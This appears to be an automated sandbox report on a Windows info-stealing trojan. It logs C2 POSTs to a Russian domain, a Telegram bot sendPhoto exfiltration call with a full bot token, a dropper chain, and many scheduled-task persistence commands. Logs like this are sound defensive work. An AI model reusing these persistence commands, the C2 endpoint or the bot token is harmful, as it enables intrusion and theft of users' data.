                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global traffic | HTTP traffic detected: POST /sqltemp.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 250345cm.renyash.ru | Content-Length: 1948 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /sqltemp.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 250345cm.renyash.ru | Content-Length: 1112 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /sqltemp.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 250345cm.renyash.ru | Content-Length: 1964 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /sqltemp.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 250345cm.renyash.ru | Content-Length: 1120 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /sqltemp.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 250345cm.renyash.ru | Content-Length: 1120 | Expect: 100-continue
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: ipinfo.io | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Host: ipinfo.io
                                    Source: global traffic | DNS traffic detected: DNS query: ipinfo.io
                                    Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                                    Source: global traffic | DNS traffic detected: DNS query: 250345cm.renyash.ru
                                    Source: unknown | HTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1 | Content-Type: multipart/form-data; boundary="41e39329-f7ed-4a24-a87a-8d5d41ec4466" | Host: api.telegram.org | Content-Length: 86650 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.reP
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.reP2y
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru/
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru/sqltemp.php
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002BA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ruve
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.0000000002E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.00000000030FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                    Source: fontdrvhost.exe, 00000005.00000002.2218252211.0000000000D22000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, BoUXaXGR.log.5.dr, LtQnCbUd.log.24.drString found in binary or memory: https://api.telegram.org/bot
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoX
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                                    Source: fontdrvhost.exe, 00000005.00000002.2218252211.0000000000D22000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, BoUXaXGR.log.5.dr, LtQnCbUd.log.24.drString found in binary or memory: https://ipinfo.io/country
                                    Source: fontdrvhost.exe, 00000005.00000002.2218252211.0000000000D22000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, BoUXaXGR.log.5.dr, LtQnCbUd.log.24.drString found in binary or memory: https://ipinfo.io/ip
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://support.mozilla.org
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org#
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49710 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49712 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49779 version: TLS 1.2
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Code function: 0_2_00B86FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                                    Source: C:\Drivers\fontdrvhost.exe File created: C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe
                                    Source: C:\Drivers\fontdrvhost.exe File created: C:\Windows\IME\IMEKR\fdadf3e88d0159
                                    Source: Joe Sandbox View Dropped File: C:\Drivers\fontdrvhost.exe C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                    Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                    Source: Joe Sandbox View Dropped File: C:\Program Files\Internet Explorer\en-US\conhost.exe C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Code function: String function: 00B9F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Code function: String function: 00B9EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Code function: String function: 00B9EB78 appears 39 times
                                    Source: eP6sjvTqJa.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs eP6sjvTqJa.exe
                                    Source: eP6sjvTqJa.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: fontdrvhost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AdbXCBUViTnoVBSsOq.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: backgroundTaskHost.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AdbXCBUViTnoVBSsOq.exe0.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: conhost.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AdbXCBUViTnoVBSsOq.exe1.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@40/51@3/3
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Code function: 0_2_00B86C74 GetLastError,FormatMessageW
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Code function: 0_2_00B9A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                                    Source: C:\Drivers\fontdrvhost.exe File created: C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                    Source: C:\Drivers\fontdrvhost.exe File created: C:\Users\user\Desktop\OwXMDaSq.log
                                    Source: C:\Drivers\fontdrvhost.exe Mutant created: NULL
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\fontdrvhost
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
                                    Source: C:\Drivers\fontdrvhost.exe File created: C:\Users\user\AppData\Local\Temp\GxxkeYPkal
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Command line argument: sfxname 0_2_00B9DF1E
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Command line argument: sfxstime 0_2_00B9DF1E
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Command line argument: STARTDLG 0_2_00B9DF1E
                                    Source: eP6sjvTqJa.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: eP6sjvTqJa.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Drivers\fontdrvhost.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe File read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: BQS1omMoER.24.dr, e7yBZipER6.24.dr, PcelLUrJfI.24.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: eP6sjvTqJa.exe Virustotal: Detection: 59%
                                    Source: eP6sjvTqJa.exe ReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe File read: C:\Users\user\Desktop\eP6sjvTqJa.exe
                                    Source: unknown Process created: C:\Users\user\Desktop\eP6sjvTqJa.exe "C:\Users\user\Desktop\eP6sjvTqJa.exe"
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\user\backgroundTaskHost.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                    Source: unknown Process created: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                    Source: unknown Process created: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                    Source: unknown Process created: C:\Drivers\fontdrvhost.exe C:\Drivers\fontdrvhost.exe
                                    Source: unknown Process created: C:\Drivers\fontdrvhost.exe C:\Drivers\fontdrvhost.exe
                                    Source: C:\Drivers\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Drivers\fontdrvhost.exe "C:\Drivers\fontdrvhost.exe"
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
